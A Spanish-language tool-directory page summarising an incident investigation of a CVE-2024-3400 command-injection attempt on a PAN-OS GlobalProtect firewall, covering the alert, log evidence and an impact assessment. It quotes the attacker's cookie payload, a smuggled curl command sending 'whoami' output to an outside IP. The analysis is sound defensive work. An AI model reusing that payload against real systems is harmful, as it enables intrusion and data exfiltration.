Directorio de Herramientas
Categorías
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — Investigación de un intento de inyección de comandos PAN-OS CVE-2024-3400, analizando la entrega del payload, el procesamiento interno y la validación de la ejecución basada en evidencia de registros. | Kitploit
Herramientas / GitHub / zedocun / pan-os-cve-2024-3400-command-injection-investigation
zedocun/pan-os-cve-2024-3400-command-injection-investigation PAN-OS-CVE-2024-3400-Command-Injection-Investigation Investigación de un intento de inyección de comandos PAN-OS CVE-2024-3400, analizando la entrega del payload, el procesamiento interno y la validación de la ejecución basada en evidencia de registros.
1 2 hace 4 mesesDescubre las herramientas más usadas por nuestra comunidad.
Últimos 7 Días Últimos 30 Días
Investigando un intento de inyección de comandos en PAN-OS CVE-2024-3400
Resumen
Este proyecto documenta la investigación de un intento de inyección de comandos CVE-2024-3400 dirigido al servicio PAN-OS GlobalProtect.
El objetivo era determinar:
si se trata de un ataque real
si se produjo la ejecución de comandos
si hay evidencia de compromiso
Resumen de la alerta
Se activó una alerta crítica indicando un posible intento de explotación.
Objetivo: 172.16.17.139 (PA-Firewall-01)
Origen: 144.172.79.92
Endpoint: /global-protect/login.esp
Método: POST
Acción: Permitida
Payload malicioso
La solicitud contiene una cookie manipulada:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)
Observaciones clave
${IFS} evita el filtrado de espacios
whoami intenta obtener la identidad del sistema
curl intenta comunicación saliente
Este es un payload de inyección de comandos
Evidencia del servidor web Los registros de Nginx confirman que la solicitud llegó al servidor:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl
La solicitud maliciosa fue aceptada y procesada.
Procesamiento interno Los registros del sistema muestran que el payload alcanzó la lógica interna:
Hallazgo clave
el payload fue incrustado en un comando interno (dt_curl)
se intentó una solicitud saliente
la cadena de ejecución alcanzó componentes internos
Falló la resolución DNS → el intento de salida falló
Infraestructura del atacante
144.172.79.92
marcada como maliciosa
asociada con un proveedor de alojamiento
Esto confirma un origen atacante externo.
Línea de tiempo de la red Varias IPs interactuaron con el sistema antes del ataque:
Solo 144.172.79.92 está directamente relacionada con la explotación.
Evaluación de impacto
Confirmado
intento de explotación dirigido a CVE-2024-3400
payload malicioso entregado
solicitud procesada por el servidor
payload alcanzó el procesamiento interno
se desencadenó un intento de salida
No confirmado
ejecución de comandos del sistema
salida del comando
exfiltración de datos
reverse shell
persistencia
movimiento lateral
Conclusión Este fue un intento real de inyección de comandos .
entregar una solicitud maliciosa
inyectar un payload
desencadenar el procesamiento interno
no hay ejecución confirmada ni compromiso del sistema
Clasificación final Intento de inyección de comandos
Payload procesado - Sin ejecución ni impacto confirmados